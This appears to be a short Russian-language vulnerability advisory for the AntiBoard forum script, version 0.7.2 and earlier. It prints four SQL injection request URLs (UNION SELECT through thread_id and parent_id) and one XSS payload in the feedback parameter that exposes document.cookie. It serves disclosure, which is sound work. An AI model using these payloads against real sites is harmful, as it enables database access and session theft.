Программа: AntiBoard 0.7.2 и более ранние версии 

Уязвимости в AntiBoard позволяют удаленному пользователю внедрить SQL команды и выполнить XSS нападение. 

1. SQL инъекция: 

/antiboard.php?thread_id=1%20UNION%20ALL%20 select%20field%20from%20whatever--&mode=threaded&sort_order=

/antiboard.php?range=all&mode=threaded&thread_id =1&reply=1&parent_id=1%20UNION%20ALL%20
select%20field%20from%20whatever--

/antiboard.php?range=all&thread_id=1%20UNION%
20ALL%20select%20field%20from%20whatever-- &sort_order=ASC&mode=threaded

/antiboard.php?thread_id=1&parent_id=1%20UNION
%20ALL%20select%20field%20from%20whatever-- &mode=nested&reply=1

2. XSS: 

http://[target]/antiboard.php? thread_id=1&mode=threaded& range=&feedback=<script>alert(document.cookie);
</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии